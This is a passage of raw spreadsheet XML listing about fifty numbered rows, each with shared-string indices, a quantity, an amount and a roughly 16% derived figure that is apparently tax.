        <v>12279</v>
      </c>
      <c r="E2698" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2698" s="238" t="s">
        <v>12280</v>
      </c>
      <c r="G2698" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2698" s="10">
        <v>37</v>
      </c>
      <c r="I2698" s="14">
        <v>230.58</v>
      </c>
      <c r="J2698" s="15">
        <v>36.8816</v>
      </c>
      <c r="K2698" s="16"/>
    </row>
    <row r="2699" spans="2:11">
      <c r="B2699" s="9">
        <v>2733</v>
      </c>
      <c r="C2699" s="238" t="s">
        <v>12281</v>
      </c>
      <c r="D2699" s="238" t="s">
        <v>12282</v>
      </c>
      <c r="E2699" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2699" s="238" t="s">
        <v>12283</v>
      </c>
      <c r="G2699" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2699" s="10">
        <v>15</v>
      </c>
      <c r="I2699" s="14">
        <v>23.49</v>
      </c>
      <c r="J2699" s="15">
        <v>3.768</v>
      </c>
      <c r="K2699" s="16"/>
    </row>
    <row r="2700" spans="2:11">
      <c r="B2700" s="9">
        <v>2734</v>
      </c>
      <c r="C2700" s="238" t="s">
        <v>12284</v>
      </c>
      <c r="D2700" s="238" t="s">
        <v>12285</v>
      </c>
      <c r="E2700" s="238" t="s">
        <v>12286</v>
      </c>
      <c r="F2700" s="238" t="s">
        <v>11779</v>
      </c>
      <c r="G2700" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2700" s="10">
        <v>3</v>
      </c>
      <c r="I2700" s="14">
        <v>419.14</v>
      </c>
      <c r="J2700" s="15">
        <v>67.0608</v>
      </c>
      <c r="K2700" s="16"/>
    </row>
    <row r="2701" spans="2:11">
      <c r="B2701" s="9">
        <v>2735</v>
      </c>
      <c r="C2701" s="238" t="s">
        <v>12287</v>
      </c>
      <c r="D2701" s="238" t="s">
        <v>12288</v>
      </c>
      <c r="E2701" s="238" t="s">
        <v>4758</v>
      </c>
      <c r="F2701" s="238" t="s">
        <v>12289</v>
      </c>
      <c r="G2701" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2701" s="10">
        <v>14</v>
      </c>
      <c r="I2701" s="14">
        <v>694.03</v>
      </c>
      <c r="J2701" s="15">
        <v>111.0368</v>
      </c>
      <c r="K2701" s="16"/>
    </row>
    <row r="2702" spans="2:11">
      <c r="B2702" s="9">
        <v>2736</v>
      </c>
      <c r="C2702" s="238" t="s">
        <v>12290</v>
      </c>
      <c r="D2702" s="238" t="s">
        <v>12291</v>
      </c>
      <c r="E2702" s="238" t="s">
        <v>12292</v>
      </c>
      <c r="F2702" s="238" t="s">
        <v>12293</v>
      </c>
      <c r="G2702" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2702" s="10">
        <v>2</v>
      </c>
      <c r="I2702" s="14">
        <v>290.53</v>
      </c>
      <c r="J2702" s="15">
        <v>46.4864</v>
      </c>
      <c r="K2702" s="16"/>
    </row>
    <row r="2703" spans="2:11">
      <c r="B2703" s="9">
        <v>2737</v>
      </c>
      <c r="C2703" s="238" t="s">
        <v>12294</v>
      </c>
      <c r="D2703" s="238" t="s">
        <v>12295</v>
      </c>
      <c r="E2703" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F2703" s="238" t="s">
        <v>12296</v>
      </c>
      <c r="G2703" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2703" s="10">
        <v>6</v>
      </c>
      <c r="I2703" s="14">
        <v>2312.05</v>
      </c>
      <c r="J2703" s="15">
        <v>369.9264</v>
      </c>
      <c r="K2703" s="16"/>
    </row>
    <row r="2704" spans="2:11">
      <c r="B2704" s="9">
        <v>2738</v>
      </c>
      <c r="C2704" s="238" t="s">
        <v>12297</v>
      </c>
      <c r="D2704" s="238" t="s">
        <v>12298</v>
      </c>
      <c r="E2704" s="238" t="s">
        <v>12299</v>
      </c>
      <c r="F2704" s="9"/>
      <c r="G2704" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2704" s="10">
        <v>21</v>
      </c>
      <c r="I2704" s="14">
        <v>171.85</v>
      </c>
      <c r="J2704" s="15">
        <v>27.4848</v>
      </c>
      <c r="K2704" s="16"/>
    </row>
    <row r="2705" spans="2:11">
      <c r="B2705" s="9">
        <v>2739</v>
      </c>
      <c r="C2705" s="238" t="s">
        <v>12300</v>
      </c>
      <c r="D2705" s="9"/>
      <c r="E2705" s="238" t="s">
        <v>7839</v>
      </c>
      <c r="F2705" s="238" t="s">
        <v>12301</v>
      </c>
      <c r="G2705" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2705" s="10">
        <v>4</v>
      </c>
      <c r="I2705" s="14">
        <v>2030.77</v>
      </c>
      <c r="J2705" s="15">
        <v>324.9216</v>
      </c>
      <c r="K2705" s="16"/>
    </row>
    <row r="2706" spans="2:11">
      <c r="B2706" s="9">
        <v>2740</v>
      </c>
      <c r="C2706" s="238" t="s">
        <v>12302</v>
      </c>
      <c r="D2706" s="238" t="s">
        <v>12303</v>
      </c>
      <c r="E2706" s="238" t="s">
        <v>10991</v>
      </c>
      <c r="F2706" s="238" t="s">
        <v>12304</v>
      </c>
      <c r="G2706" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2706" s="10">
        <v>2</v>
      </c>
      <c r="I2706" s="14">
        <v>353.84</v>
      </c>
      <c r="J2706" s="15">
        <v>56.6144</v>
      </c>
      <c r="K2706" s="16"/>
    </row>
    <row r="2707" spans="2:11">
      <c r="B2707" s="9">
        <v>2741</v>
      </c>
      <c r="C2707" s="238" t="s">
        <v>12305</v>
      </c>
      <c r="D2707" s="238" t="s">
        <v>12306</v>
      </c>
      <c r="E2707" s="238" t="s">
        <v>8615</v>
      </c>
      <c r="F2707" s="238" t="s">
        <v>12307</v>
      </c>
      <c r="G2707" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2707" s="10">
        <v>8</v>
      </c>
      <c r="I2707" s="14">
        <v>38.4</v>
      </c>
      <c r="J2707" s="15">
        <v>6.144</v>
      </c>
      <c r="K2707" s="16"/>
    </row>
    <row r="2708" spans="2:11">
      <c r="B2708" s="9">
        <v>2742</v>
      </c>
      <c r="C2708" s="238" t="s">
        <v>12308</v>
      </c>
      <c r="D2708" s="238" t="s">
        <v>12309</v>
      </c>
      <c r="E2708" s="238" t="s">
        <v>12310</v>
      </c>
      <c r="F2708" s="238" t="s">
        <v>12311</v>
      </c>
      <c r="G2708" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2708" s="10">
        <v>8</v>
      </c>
      <c r="I2708" s="14">
        <v>291.48</v>
      </c>
      <c r="J2708" s="15">
        <v>46.6432</v>
      </c>
      <c r="K2708" s="16"/>
    </row>
    <row r="2709" spans="2:11">
      <c r="B2709" s="9">
        <v>2743</v>
      </c>
      <c r="C2709" s="238" t="s">
        <v>12312</v>
      </c>
      <c r="D2709" s="238" t="s">
        <v>12313</v>
      </c>
      <c r="E2709" s="238" t="s">
        <v>12314</v>
      </c>
      <c r="F2709" s="238" t="s">
        <v>12315</v>
      </c>
      <c r="G2709" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2709" s="10">
        <v>8</v>
      </c>
      <c r="I2709" s="14">
        <v>58.79</v>
      </c>
      <c r="J2709" s="15">
        <v>9.408</v>
      </c>
      <c r="K2709" s="16"/>
    </row>
    <row r="2710" spans="2:11">
      <c r="B2710" s="9">
        <v>2744</v>
      </c>
      <c r="C2710" s="238" t="s">
        <v>12316</v>
      </c>
      <c r="D2710" s="238" t="s">
        <v>5471</v>
      </c>
      <c r="E2710" s="238" t="s">
        <v>11231</v>
      </c>
      <c r="F2710" s="9"/>
      <c r="G2710" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2710" s="10">
        <v>1</v>
      </c>
      <c r="I2710" s="14">
        <v>3.5</v>
      </c>
      <c r="J2710" s="15">
        <v>0.56</v>
      </c>
      <c r="K2710" s="16"/>
    </row>
    <row r="2711" spans="2:11">
      <c r="B2711" s="9">
        <v>2745</v>
      </c>
      <c r="C2711" s="238" t="s">
        <v>12317</v>
      </c>
      <c r="D2711" s="238" t="s">
        <v>12318</v>
      </c>
      <c r="E2711" s="238" t="s">
        <v>12319</v>
      </c>
      <c r="F2711" s="9"/>
      <c r="G2711" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2711" s="10">
        <v>1</v>
      </c>
      <c r="I2711" s="14">
        <v>893.17</v>
      </c>
      <c r="J2711" s="15">
        <v>142.9072</v>
      </c>
      <c r="K2711" s="16"/>
    </row>
    <row r="2712" spans="2:11">
      <c r="B2712" s="9">
        <v>2746</v>
      </c>
      <c r="C2712" s="238" t="s">
        <v>12320</v>
      </c>
      <c r="D2712" s="238" t="s">
        <v>12321</v>
      </c>
      <c r="E2712" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2712" s="238" t="s">
        <v>12322</v>
      </c>
      <c r="G2712" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2712" s="10">
        <v>8</v>
      </c>
      <c r="I2712" s="14">
        <v>3.2</v>
      </c>
      <c r="J2712" s="15">
        <v>0.512</v>
      </c>
      <c r="K2712" s="16"/>
    </row>
    <row r="2713" spans="2:11">
      <c r="B2713" s="9">
        <v>2747</v>
      </c>
      <c r="C2713" s="238" t="s">
        <v>12323</v>
      </c>
      <c r="D2713" s="238" t="s">
        <v>12324</v>
      </c>
      <c r="E2713" s="238" t="s">
        <v>6810</v>
      </c>
      <c r="F2713" s="238" t="s">
        <v>12325</v>
      </c>
      <c r="G2713" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2713" s="10">
        <v>4</v>
      </c>
      <c r="I2713" s="14">
        <v>2.4</v>
      </c>
      <c r="J2713" s="15">
        <v>0.384</v>
      </c>
      <c r="K2713" s="16"/>
    </row>
    <row r="2714" spans="2:11">
      <c r="B2714" s="9">
        <v>2748</v>
      </c>
      <c r="C2714" s="238" t="s">
        <v>12326</v>
      </c>
      <c r="D2714" s="238" t="s">
        <v>12327</v>
      </c>
      <c r="E2714" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2714" s="238" t="s">
        <v>12328</v>
      </c>
      <c r="G2714" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2714" s="10">
        <v>2</v>
      </c>
      <c r="I2714" s="14">
        <v>10.2</v>
      </c>
      <c r="J2714" s="15">
        <v>1.632</v>
      </c>
      <c r="K2714" s="16"/>
    </row>
    <row r="2715" spans="2:11">
      <c r="B2715" s="9">
        <v>2749</v>
      </c>
      <c r="C2715" s="238" t="s">
        <v>12329</v>
      </c>
      <c r="D2715" s="238" t="s">
        <v>12330</v>
      </c>
      <c r="E2715" s="238" t="s">
        <v>12331</v>
      </c>
      <c r="F2715" s="238" t="s">
        <v>12332</v>
      </c>
      <c r="G2715" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2715" s="10">
        <v>11</v>
      </c>
      <c r="I2715" s="14">
        <v>218.8</v>
      </c>
      <c r="J2715" s="15">
        <v>35.0064</v>
      </c>
      <c r="K2715" s="16"/>
    </row>
    <row r="2716" spans="2:11">
      <c r="B2716" s="9">
        <v>2750</v>
      </c>
      <c r="C2716" s="238" t="s">
        <v>12333</v>
      </c>
      <c r="D2716" s="238" t="s">
        <v>12334</v>
      </c>
      <c r="E2716" s="238" t="s">
        <v>12335</v>
      </c>
      <c r="F2716" s="9"/>
      <c r="G2716" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2716" s="10">
        <v>7</v>
      </c>
      <c r="I2716" s="14">
        <v>879.46</v>
      </c>
      <c r="J2716" s="15">
        <v>140.7168</v>
      </c>
      <c r="K2716" s="16"/>
    </row>
    <row r="2717" spans="2:11">
      <c r="B2717" s="9">
        <v>2751</v>
      </c>
      <c r="C2717" s="238" t="s">
        <v>12336</v>
      </c>
      <c r="D2717" s="238" t="s">
        <v>12337</v>
      </c>
      <c r="E2717" s="238" t="s">
        <v>12338</v>
      </c>
      <c r="F2717" s="238" t="s">
        <v>12339</v>
      </c>
      <c r="G2717" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2717" s="10">
        <v>4</v>
      </c>
      <c r="I2717" s="14">
        <v>98.29</v>
      </c>
      <c r="J2717" s="15">
        <v>15.7248</v>
      </c>
      <c r="K2717" s="16"/>
    </row>
    <row r="2718" spans="2:11">
      <c r="B2718" s="9">
        <v>2752</v>
      </c>
      <c r="C2718" s="238" t="s">
        <v>12340</v>
      </c>
      <c r="D2718" s="238" t="s">
        <v>12341</v>
      </c>
      <c r="E2718" s="238" t="s">
        <v>7366</v>
      </c>
      <c r="F2718" s="238" t="s">
        <v>12342</v>
      </c>
      <c r="G2718" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2718" s="10">
        <v>1</v>
      </c>
      <c r="I2718" s="14">
        <v>28</v>
      </c>
      <c r="J2718" s="15">
        <v>4.48</v>
      </c>
      <c r="K2718" s="16"/>
    </row>
    <row r="2719" spans="2:11">
      <c r="B2719" s="9">
        <v>2753</v>
      </c>
      <c r="C2719" s="238" t="s">
        <v>12343</v>
      </c>
      <c r="D2719" s="238" t="s">
        <v>12344</v>
      </c>
      <c r="E2719" s="238" t="s">
        <v>12345</v>
      </c>
      <c r="F2719" s="238" t="s">
        <v>12346</v>
      </c>
      <c r="G2719" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2719" s="10">
        <v>2</v>
      </c>
      <c r="I2719" s="14">
        <v>110.25</v>
      </c>
      <c r="J2719" s="15">
        <v>17.6416</v>
      </c>
      <c r="K2719" s="16"/>
    </row>
    <row r="2720" spans="2:11">
      <c r="B2720" s="9">
        <v>2754</v>
      </c>
      <c r="C2720" s="238" t="s">
        <v>12347</v>
      </c>
      <c r="D2720" s="238" t="s">
        <v>12348</v>
      </c>
      <c r="E2720" s="238" t="s">
        <v>12349</v>
      </c>
      <c r="F2720" s="9"/>
      <c r="G2720" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2720" s="10">
        <v>30</v>
      </c>
      <c r="I2720" s="14">
        <v>252.87</v>
      </c>
      <c r="J2720" s="15">
        <v>40.464</v>
      </c>
      <c r="K2720" s="16"/>
    </row>
    <row r="2721" spans="2:11">
      <c r="B2721" s="9">
        <v>2755</v>
      </c>
      <c r="C2721" s="238" t="s">
        <v>12350</v>
      </c>
      <c r="D2721" s="238" t="s">
        <v>12351</v>
      </c>
      <c r="E2721" s="238" t="s">
        <v>12352</v>
      </c>
      <c r="F2721" s="9"/>
      <c r="G2721" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2721" s="10">
        <v>11</v>
      </c>
      <c r="I2721" s="14">
        <v>431.2</v>
      </c>
      <c r="J2721" s="15">
        <v>68.992</v>
      </c>
      <c r="K2721" s="16"/>
    </row>
    <row r="2722" spans="2:11">
      <c r="B2722" s="9">
        <v>2756</v>
      </c>
      <c r="C2722" s="238" t="s">
        <v>12353</v>
      </c>
      <c r="D2722" s="238" t="s">
        <v>12354</v>
      </c>
      <c r="E2722" s="238" t="s">
        <v>11582</v>
      </c>
      <c r="F2722" s="9"/>
      <c r="G2722" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2722" s="10">
        <v>9</v>
      </c>
      <c r="I2722" s="14">
        <v>57.44</v>
      </c>
      <c r="J2722" s="15">
        <v>9.1872</v>
      </c>
      <c r="K2722" s="16"/>
    </row>
    <row r="2723" spans="2:11">
      <c r="B2723" s="9">
        <v>2757</v>
      </c>
      <c r="C2723" s="238" t="s">
        <v>12355</v>
      </c>
      <c r="D2723" s="238" t="s">
        <v>12356</v>
      </c>
      <c r="E2723" s="238" t="s">
        <v>11472</v>
      </c>
      <c r="F2723" s="238" t="s">
        <v>12357</v>
      </c>
      <c r="G2723" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2723" s="10">
        <v>2</v>
      </c>
      <c r="I2723" s="14">
        <v>148.92</v>
      </c>
      <c r="J2723" s="15">
        <v>23.8272</v>
      </c>
      <c r="K2723" s="16"/>
    </row>
    <row r="2724" spans="2:11">
      <c r="B2724" s="9">
        <v>2758</v>
      </c>
      <c r="C2724" s="238" t="s">
        <v>12358</v>
      </c>
      <c r="D2724" s="238" t="s">
        <v>12359</v>
      </c>
      <c r="E2724" s="238" t="s">
        <v>11472</v>
      </c>
      <c r="F2724" s="238" t="s">
        <v>12360</v>
      </c>
      <c r="G2724" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2724" s="10">
        <v>3</v>
      </c>
      <c r="I2724" s="14">
        <v>210</v>
      </c>
      <c r="J2724" s="15">
        <v>33.6</v>
      </c>
      <c r="K2724" s="16"/>
    </row>
    <row r="2725" spans="2:11">
      <c r="B2725" s="9">
        <v>2759</v>
      </c>
      <c r="C2725" s="238" t="s">
        <v>12361</v>
      </c>
      <c r="D2725" s="238" t="s">
        <v>12362</v>
      </c>
      <c r="E2725" s="238" t="s">
        <v>11472</v>
      </c>
      <c r="F2725" s="238" t="s">
        <v>12363</v>
      </c>
      <c r="G2725" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2725" s="10">
        <v>3</v>
      </c>
      <c r="I2725" s="14">
        <v>144</v>
      </c>
      <c r="J2725" s="15">
        <v>23.04</v>
      </c>
      <c r="K2725" s="16"/>
    </row>
    <row r="2726" spans="2:11">
      <c r="B2726" s="9">
        <v>2760</v>
      </c>
      <c r="C2726" s="238" t="s">
        <v>12364</v>
      </c>
      <c r="D2726" s="238" t="s">
        <v>12365</v>
      </c>
      <c r="E2726" s="238" t="s">
        <v>11472</v>
      </c>
      <c r="F2726" s="238" t="s">
        <v>12366</v>
      </c>
      <c r="G2726" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2726" s="10">
        <v>1</v>
      </c>
      <c r="I2726" s="14">
        <v>48</v>
      </c>
      <c r="J2726" s="15">
        <v>7.68</v>
      </c>
      <c r="K2726" s="16"/>
    </row>
    <row r="2727" spans="2:11">
      <c r="B2727" s="9">
        <v>2761</v>
      </c>
      <c r="C2727" s="238" t="s">
        <v>12367</v>
      </c>
      <c r="D2727" s="238" t="s">
        <v>12368</v>
      </c>
      <c r="E2727" s="238" t="s">
        <v>6485</v>
      </c>
      <c r="F2727" s="238" t="s">
        <v>12369</v>
      </c>
      <c r="G2727" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2727" s="10">
        <v>4</v>
      </c>
      <c r="I2727" s="14">
        <v>661.8</v>
      </c>
      <c r="J2727" s="15">
        <v>105.888</v>
      </c>
      <c r="K2727" s="16"/>
    </row>
    <row r="2728" spans="2:11">
      <c r="B2728" s="9">
        <v>2762</v>
      </c>
      <c r="C2728" s="238" t="s">
        <v>12370</v>
      </c>
      <c r="D2728" s="238" t="s">
        <v>12371</v>
      </c>
      <c r="E2728" s="238" t="s">
        <v>2987</v>
      </c>
      <c r="F2728" s="238" t="s">
        <v>12372</v>
      </c>
      <c r="G2728" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2728" s="10">
        <v>2</v>
      </c>
      <c r="I2728" s="14">
        <v>1481.48</v>
      </c>
      <c r="J2728" s="15">
        <v>237.0368</v>
      </c>
      <c r="K2728" s="16"/>
    </row>
    <row r="2729" spans="2:11">
      <c r="B2729" s="9">
        <v>2763</v>
      </c>
      <c r="C2729" s="238" t="s">
        <v>12373</v>
      </c>
      <c r="D2729" s="238" t="s">
        <v>4757</v>
      </c>
      <c r="E2729" s="238" t="s">
        <v>12374</v>
      </c>
      <c r="F2729" s="238" t="s">
        <v>12375</v>
      </c>
      <c r="G2729" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2729" s="10">
        <v>2</v>
      </c>
      <c r="I2729" s="14">
        <v>11965.81</v>
      </c>
      <c r="J2729" s="15">
        <v>1914.5312</v>
      </c>
      <c r="K2729" s="16"/>
    </row>
    <row r="2730" spans="2:11">
      <c r="B2730" s="9">
        <v>2764</v>
      </c>
      <c r="C2730" s="238" t="s">
        <v>12376</v>
      </c>
      <c r="D2730" s="238" t="s">
        <v>12377</v>
      </c>
      <c r="E2730" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F2730" s="238" t="s">
        <v>12378</v>
      </c>
      <c r="G2730" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2730" s="10">
        <v>3</v>
      </c>
      <c r="I2730" s="14">
        <v>5074.09</v>
      </c>
      <c r="J2730" s="15">
        <v>811.8528</v>
      </c>
      <c r="K2730" s="16"/>
    </row>
    <row r="2731" spans="2:11">
      <c r="B2731" s="9">
        <v>2765</v>
      </c>
      <c r="C2731" s="238" t="s">
        <v>12379</v>
      </c>
      <c r="D2731" s="238" t="s">
        <v>6798</v>
      </c>
      <c r="E2731" s="238" t="s">
        <v>12247</v>
      </c>
      <c r="F2731" s="238" t="s">
        <v>12380</v>
      </c>
      <c r="G2731" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2731" s="10">
        <v>50</v>
      </c>
      <c r="I2731" s="14">
        <v>384.73</v>
      </c>
      <c r="J2731" s="15">
        <v>61.52</v>
      </c>
      <c r="K2731" s="16"/>
    </row>
    <row r="2732" spans="2:11">
      <c r="B2732" s="9">
        <v>2766</v>
      </c>
      <c r="C2732" s="238" t="s">
        <v>12381</v>
      </c>
      <c r="D2732" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E2732" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F2732" s="238" t="s">
        <v>12380</v>
      </c>
      <c r="G2732" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2732" s="10">
        <v>4</v>
      </c>
      <c r="I2732" s="14">
        <v>6039.88</v>
      </c>
      <c r="J2732" s="15">
        <v>966.3808</v>
      </c>
      <c r="K2732" s="16"/>
    </row>
    <row r="2733" spans="2:11">
      <c r="B2733" s="9">
        <v>2767</v>
      </c>
      <c r="C2733" s="238" t="s">
        <v>12382</v>
      </c>
      <c r="D2733" s="238" t="s">
        <v>12383</v>
      </c>
      <c r="E2733" s="238" t="s">
        <v>12384</v>
      </c>
      <c r="F2733" s="238" t="s">
        <v>12385</v>
      </c>
      <c r="G2733" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2733" s="10">
        <v>1</v>
      </c>
      <c r="I2733" s="14">
        <v>5</v>
      </c>
      <c r="J2733" s="15">
        <v>0.8</v>
      </c>
      <c r="K2733" s="16"/>
    </row>
    <row r="2734" spans="2:11">
      <c r="B2734" s="9">
        <v>2768</v>
      </c>
      <c r="C2734" s="238" t="s">
        <v>12386</v>
      </c>
      <c r="D2734" s="238" t="s">
        <v>12387</v>
      </c>
      <c r="E2734" s="238" t="s">
        <v>12388</v>
      </c>
      <c r="F2734" s="238" t="s">
        <v>12389</v>
      </c>
      <c r="G2734" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2734" s="10">
        <v>6</v>
      </c>
      <c r="I2734" s="14">
        <v>24.6</v>
      </c>
      <c r="J2734" s="15">
        <v>3.936</v>
      </c>
      <c r="K2734" s="16"/>
    </row>
    <row r="2735" spans="2:11">
      <c r="B2735" s="9">
        <v>2769</v>
      </c>
      <c r="C2735" s="238" t="s">
        <v>12390</v>
      </c>
      <c r="D2735" s="238" t="s">
        <v>12391</v>
      </c>
      <c r="E2735" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2735" s="238" t="s">
        <v>12392</v>
      </c>
      <c r="G2735" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2735" s="10">
        <v>1</v>
      </c>
      <c r="I2735" s="14">
        <v>40</v>
      </c>
      <c r="J2735" s="15">
        <v>6.4</v>
      </c>
      <c r="K2735" s="16"/>
    </row>
    <row r="2736" spans="2:11">
      <c r="B2736" s="9">
        <v>2770</v>
      </c>
      <c r="C2736" s="238" t="s">
        <v>12393</v>
      </c>
      <c r="D2736" s="238" t="s">
        <v>12394</v>
      </c>
      <c r="E2736" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2736" s="238" t="s">
        <v>12395</v>
      </c>
      <c r="G2736" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2736" s="10">
        <v>3</v>
      </c>
      <c r="I2736" s="14">
        <v>57.49</v>
      </c>
      <c r="J2736" s="15">
        <v>9.1968</v>
      </c>
      <c r="K2736" s="16"/>
    </row>
    <row r="2737" spans="2:11">
      <c r="B2737" s="9">
        <v>2771</v>
      </c>
      <c r="C2737" s="238" t="s">
        <v>12396</v>
      </c>
      <c r="D2737" s="9"/>
      <c r="E2737" s="238" t="s">
        <v>6915</v>
      </c>
      <c r="F2737" s="238" t="s">
        <v>12397</v>
      </c>
      <c r="G2737" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2737" s="10">
        <v>1</v>
      </c>
      <c r="I2737" s="14">
        <v>606.84</v>
      </c>
      <c r="J2737" s="15">
        <v>97.0944</v>
      </c>
      <c r="K2737" s="16"/>
    </row>
    <row r="2738" spans="2:11">
      <c r="B2738" s="9">
        <v>2772</v>
      </c>
      <c r="C2738" s="238" t="s">
        <v>12398</v>
      </c>
      <c r="D2738" s="9"/>
      <c r="E2738" s="238" t="s">
        <v>12399</v>
      </c>
      <c r="F2738" s="238" t="s">
        <v>12400</v>
      </c>
      <c r="G2738" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2738" s="10">
        <v>2</v>
      </c>
      <c r="I2738" s="14">
        <v>1572.64</v>
      </c>
      <c r="J2738" s="15">
        <v>251.6224</v>
      </c>
      <c r="K2738" s="16"/>
    </row>
    <row r="2739" spans="2:11">
      <c r="B2739" s="9">
        <v>2773</v>
      </c>
      <c r="C2739" s="238" t="s">
        <v>12401</v>
      </c>
      <c r="D2739" s="238" t="s">
        <v>12402</v>
      </c>
      <c r="E2739" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F2739" s="238" t="s">
        <v>12403</v>
      </c>
      <c r="G2739" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2739" s="10">
        <v>3</v>
      </c>
      <c r="I2739" s="14">
        <v>2256.4</v>
      </c>
      <c r="J2739" s="15">
        <v>361.0224</v>
      </c>
      <c r="K2739" s="16"/>
    </row>
    <row r="2740" spans="2:11">
      <c r="B2740" s="9">
        <v>2774</v>
      </c>
      <c r="C2740" s="238" t="s">
        <v>12404</v>
      </c>
      <c r="D2740" s="9"/>
      <c r="E2740" s="238" t="s">
        <v>12405</v>
      </c>
      <c r="F2740" s="238" t="s">
        <v>12397</v>
      </c>
      <c r="G2740" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2740" s="10">
        <v>4</v>
      </c>
      <c r="I2740" s="14">
        <v>5470.08</v>
      </c>
      <c r="J2740" s="15">
        <v>875.2128</v>
      </c>
      <c r="K2740" s="16"/>
    </row>
    <row r="2741" spans="2:11">
      <c r="B2741" s="9">
        <v>2775</v>
      </c>
      <c r="C2741" s="238" t="s">
        <v>12406</v>
      </c>
      <c r="D2741" s="238" t="s">
        <v>12407</v>
      </c>
      <c r="E2741" s="238" t="s">
        <v>12408</v>
      </c>
      <c r="F2741" s="9"/>
      <c r="G2741" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2741" s="10">
        <v>29</v>
      </c>
      <c r="I2741" s="14">
        <v>154.45</v>
      </c>
      <c r="J2741" s="15">
        <v>24.7312</v>
      </c>
      <c r="K2741" s="16"/>
    </row>
    <row r="2742" spans="2:11">
      <c r="B2742" s="9">
        <v>2776</v>
      </c>
      <c r="C2742" s="238" t="s">
        <v>12409</v>
      </c>
      <c r="D2742" s="238" t="s">
        <v>12410</v>
      </c>
      <c r="E2742" s="238" t="s">
        <v>12411</v>
      </c>
      <c r="F2742" s="238" t="s">
        <v>12412</v>
      </c>
      <c r="G2742" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2742" s="10">
        <v>5</v>
      </c>
      <c r="I2742" s="14">
        <v>360</v>
      </c>
      <c r="J2742" s="15">
        <v>57.6</v>
      </c>
      <c r="K2742" s="16"/>
    </row>
    <row r="2743" spans="2:11">
      <c r="B2743" s="9">
        <v>2777</v>
      </c>
      <c r="C2743" s="238" t="s">
        <v>12413</v>
      </c>
      <c r="D2743" s="238" t="s">
        <v>12414</v>
      </c>
      <c r="E2743" s="238" t="s">
        <v>12415</v>
      </c>
      <c r="F2743" s="238" t="s">
        <v>12416</v>
      </c>
      <c r="G2743" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2743" s="10">
        <v>3</v>
      </c>
      <c r="I2743" s="14">
        <v>3600</v>
      </c>
      <c r="J2743" s="15">
        <v>576</v>
      </c>
      <c r="K2743" s="16"/>
    </row>
    <row r="2744" spans="2:11">
      <c r="B2744" s="9">
        <v>2778</v>
      </c>
      <c r="C2744" s="238" t="s">
        <v>12417</v>
      </c>
      <c r="D2744" s="238" t="s">
        <v>12418</v>
      </c>
      <c r="E2744" s="238" t="s">
        <v>12419</v>
      </c>
      <c r="F2744" s="238" t="s">
        <v>12416</v>
      </c>
      <c r="G2744" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2744" s="10">
        <v>3</v>
      </c>
      <c r="I2744" s="14">
        <v>1440</v>
      </c>
      <c r="J2744" s="15">
        <v>230.4</v>
      </c>
      <c r="K2744" s="16"/>
    </row>
    <row r="2745" spans="2:11">
      <c r="B2745" s="9">
        <v>2779</v>
      </c>
      <c r="C2745" s="238" t="s">
        <v>12420</v>
      </c>
      <c r="D2745" s="238" t="s">
        <v>6748</v>
      </c>
      <c r="E2745" s="238" t="s">
        <v>6746</v>
      </c>
      <c r="F2745" s="9"/>
      <c r="G2745" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2745" s="10">
        <v>1</v>
      </c>
      <c r="I2745" s="14">
        <v>160</v>
      </c>
      <c r="J2745" s="15">
        <v>25.6</v>
      </c>
      <c r="K2745" s="16"/>
    </row>
    <row r="2746" spans="2:11">
      <c r="B2746" s="9">
